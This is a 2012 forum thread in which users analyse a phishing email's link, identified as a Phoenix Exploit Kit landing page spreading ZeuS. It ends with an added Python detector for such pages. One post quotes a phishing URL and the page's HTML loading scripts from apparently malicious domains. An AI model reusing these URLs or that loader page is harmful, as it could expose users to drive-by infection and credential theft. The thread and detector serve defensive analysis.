#21059 - 03/13/12 09:01 AM anyone else getting Smith Micro spam?
Virtual1
Registered: 08/04/09
Loc: Iowa
I make new addresses for the different businesses I email to, so I can tell who is responsible for spam and phishing.

I started receiving phishing emails a few days ago to the address I created for emailing Smith Micro. I think they're the ones that bought out Stuffit? Anyone else getting these?

Both times in the past I've tried to call and complain about someone getting me on a spam/phish list (Ford and NewEgg most recently) they've denied the possibility of any involvement. (not surprising I suppose)


Edited by cyn (03/16/12 09:50 AM)
Edit Reason: Topic moved from the Lounge to the Networking forum.
_________________________
I work for the Department of Redundancy Department

#21082 - 03/15/12 10:09 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
tacit
Registered: 08/03/09
Loc: Portland, Oregon, USA
Generally speaking, if you start getting spam to an email address, there are a few possibilities:

- The spammers found it on a Web site, forum, or email group.
- The spammers found it by doing a dictionary attack.
- You used it on a Web site or online ordering system that was hacked.
- You gave it to someone who gave, sold, or rented it to the spammers.
- You gave it to someone who was then hacked.
- You gave it to someone who is infected with an email-scraping virus.

If this email was created only for Smith Micro, that rules out the first two possibilities, leaving only the bottom four. Smith Micro probably didn't intentionally sell it on to phishers, which means they have been hacked, they are using a computer infected with a virus, or the spammers found the email address by using a brute-force dictionary attack.

How unusual is the email address? Does it use dictionary words?
_________________________
Photo gallery, all about me, and more: www.xeromag.com/franklin.html

#21083 - 03/15/12 10:14 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
Virtual1
Registered: 08/04/09
Loc: Iowa
I typically use "v1" and the company name, @vftp.net as my alias. I obviously don't post it publicly. The prepending of "v1" to the start of the addresses makes them fairly resistant to dictionary attacks. I've checked my server logs a few times in the past looking for such mischief and other than the expected dictionary attempts I don't see much.

So I follow the same conclusion as you, hacked or botnetted. Either way probably a waste of my time to contact them, they're unlikely to admit to either.
_________________________
I work for the Department of Redundancy Department

#21091 - 03/16/12 07:08 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
Virtual1
Registered: 08/04/09
Loc: Iowa
And I continue to get spam that looks like my "intuit order" is ready. Spam emails originate from Tunisia. The link tries to get me to go here:

http//livonya.com/BNCGCPNP/index.html
(attempting to autolink that url was not appreciated, ubb)

which does a really odd thing: it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their drive-by download isn't going to work, and ditches me at microsoft?

Or maybe a cocktail? Curling that URL gives:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://africafe.hu/xyv9H9GN/js.js"></script>
<script type="text/javascript" src="http://asflexs.com/5w5txgvh/js.js"></script>
<script type="text/javascript" src="http://phreklam.com/zWNrFqKG/js.js"></script>
<script type="text/javascript" src="http://zizula.ro/RxTXmiNk/js.js"></script>

</html>
_________________________
I work for the Department of Redundancy Department

#21095 - 03/16/12 10:17 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
tacit
Registered: 08/03/09
Loc: Portland, Oregon, USA
It's the Phoenix Exploit Kit.

The Web site looks at the browser, platform, plugins, and other configuration information, then attempts a cocktail of browser, Java, Flash, and PDF exploits to download the W32/ZeuS malware. I've been seeing a lot of these lately.

W32/ZeuS is a modular, programmable, configurable malware strain that's sold in underground carder communities as a do-it-yourself kit. Once it infects a computer, it waits silently until a person attempts to visit a bank site or a site like PayPal. When that happens, it begins keystroke logging and then sends the person's login credentials to a server under the control of the person who set it up. It uses advanced encryption and other techniques to mask its communication with the server.

Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.
_________________________
Photo gallery, all about me, and more: www.xeromag.com/franklin.html

#21096 - 03/16/12 10:44 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
artie505
Registered: 08/04/09
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.


Edited by artie505 (03/16/12 11:06 AM)
_________________________
The new Great Equalizer is the SEND button.

In Memory Of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire

#21097 - 03/16/12 11:14 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
artie505
Registered: 08/04/09
> [...] it does a few redirects and ends me at microsoft.com. I assume it's doing some kind of a vulnerability test and determining their driveby download isn't going to work, and ditches me at microsoft?

After seeing that it's Windows only I entered the URL and was taken to what looks like a clothing sales site.

The home page displayed a log-in pane with name and password pre-entered, which I wasn't curious enough to click on.
_________________________
The new Great Equalizer is the SEND button.

In Memory Of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire

#21098 - 03/16/12 03:35 PM Re: anyone else getting Smith Micro spam? [Re: artie505]
artie505
Registered: 08/04/09
I forgot to mention in my last post that somewhere on the road to that shopping site I acquired a microsoft.com cookie. Curious?
_________________________
The new Great Equalizer is the SEND button.

In Memory Of Harv: Those who can make you believe absurdities can make you commit atrocities. ~Voltaire

#21100 - 03/17/12 02:35 AM Re: anyone else getting Smith Micro spam? [Re: artie505]
ryck
Registered: 08/04/09
Loc: Okanagan Valley
I'd label it curious. I just checked my cookies and, although I have various Microsoft sites I visit (due to needing support for my Office software), I do not have a cookie called microsoft.com.
_________________________
ryck

iMac (Retina 5K, 27", 2017), 3.4 GHz Intel Core i5, 8GB RAM, 2400 MHz DDR4
OS Mojave 10.14.6
Canon MX710 Printer
Epson Perfection V500 Photo Scanner
Carbon Copy Clone on 1TB LaCie USB-C
Carbon Copy Clone on 500GB OWC Mercury OTG Pro

#21116 - 03/19/12 08:44 AM Re: anyone else getting Smith Micro spam? [Re: artie505]
Virtual1
Registered: 08/04/09
Loc: Iowa
Originally Posted By: artie505
> Antivirus software is almost 100% useless against ZeuS.

But will Little Snitch attempt to protect people from being victimized by the exploit by reporting the "phone-home?"

Edit: I forgot to ask how it gets itself installed.

Edit 2: Google indicates that it's Windows only.


AFAIK all the exploits it is using and attempting to install are for Windows. After trying to compromise your browser and failing, it dumps you off at some other web page.
_________________________
I work for the Department of Redundancy Department

#21117 - 03/19/12 08:46 AM Re: anyone else getting Smith Micro spam? [Re: tacit]
Virtual1
Registered: 08/04/09
Loc: Iowa
Originally Posted By: tacit
Antivirus software is almost 100% useless against ZeuS. Some antiviral programs can detect a handful of older variants; none that I know of can remove it.


Wow. I didn't know that. What do you do then? Reformat and restore safe documents?
_________________________
I work for the Department of Redundancy Department

#21155 - 03/22/12 12:03 AM Re: anyone else getting Smith Micro spam? [Re: Virtual1]
tacit
Registered: 08/03/09
Loc: Portland, Oregon, USA
Originally Posted By: Virtual1
AFAIK all the exploits it is using and attempting to install are for Windows. After trying to compromise your browser and failing, it dumps you off at some other web page.


Yep. There are several exploit kits that are shopped around to malware writers to help them spread their malware, the two most common being the Blackhole Exploit Kit and the Phoenix Exploit Kit. Both can be configured to drop any malware (not just ZeuS) and both can be configured to send the user elsewhere if the exploits all fail or if the page is loaded in a way that the malware writer doesn't want.

For example, the Phoenix Exploit Kit is often configured in such a way that if you surf to it directly it'll redirect elsewhere; it attempts the exploit if it's loaded in an iFrame. The bad guys then compromise other sites and inject iFrames into them.

Originally Posted By: Virtual1
Wow. I didn't know that. What do you do then? Reformat and restore safe documents?


Yep. Microsoft Security Essentials can remove some of the older variants of ZeuS, but for modern variants, or for some other similar malware? Yep, reformat and restore is Microsoft's recommended course of action.
_________________________
Photo gallery, all about me, and more: www.xeromag.com/franklin.html
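
Both the "WAIT PLEASE" page Virtual1 curled earlier in the thread and the hidden-iFrame injection tacit describes have a recognisable shape that a site owner or analyst can screen for; what follows is an added example, not code from the thread or from any product mentioned in it. It assumes constructed sample pages with placeholder .example domains and a hypothetical analyse() helper; real kit pages vary, so these heuristics are a triage aid, not a verdict.

```python
# Added example (not from the thread): flag HTML that looks like an exploit-kit
# landing page (several external scripts with random-looking paths, as in the
# curled page above) or a compromised page carrying a hidden injected iFrame.
# Sample pages and domains below are constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
RANDOM_JS_PATH = re.compile(r"^/[A-Za-z0-9]{6,12}/[a-z0-9]{1,8}\.js$")  # /<token>/js.js

class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts, self.iframes = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}        # valueless attrs -> ""
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "iframe":
            self.iframes.append(a)

def _is_hidden(a):
    # CSS-hidden or 0/1 pixel iframes are the usual injected-frame shape
    style = a.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        v = a.get(dim, "100").strip().lower().replace("px", "")
        if v.isdigit() and int(v) <= 1:
            return True
    return False

def analyse(html, page_host):
    # Returns a list of findings for one page served from page_host
    p = _Collector()
    p.feed(html)
    findings = []
    hosts = {u.netloc for s in p.scripts if (u := urlparse(s)).netloc
             not in ("", page_host) and RANDOM_JS_PATH.match(u.path)}
    if len(hosts) >= 2:
        findings.append("landing page: %d external random-path scripts" % len(hosts))
    for f in p.iframes:
        host = urlparse(f.get("src", "")).netloc
        if host and host != page_host and _is_hidden(f):
            findings.append("hidden iframe to " + host)
    return findings

# Constructed samples: LANDING mirrors the thread's "WAIT PLEASE" page shape.
LANDING = ('<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>'
           '<script src="http://a.example/Ab3dE9fG/js.js"></script>'
           '<script src="http://b.example/k2L8mN0p/js.js"></script></html>')
INJECTED = ('<html><body><p>Spring sale</p><iframe src="http://c.example/Q7rT/"'
            ' width="1" height="1"></iframe></body></html>')
```

Run it over a crawl of your own pages with page_host set to your domain; an unexpected hidden iframe to a third-party host is the same injection pattern tacit describes and is worth pulling the page for review.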
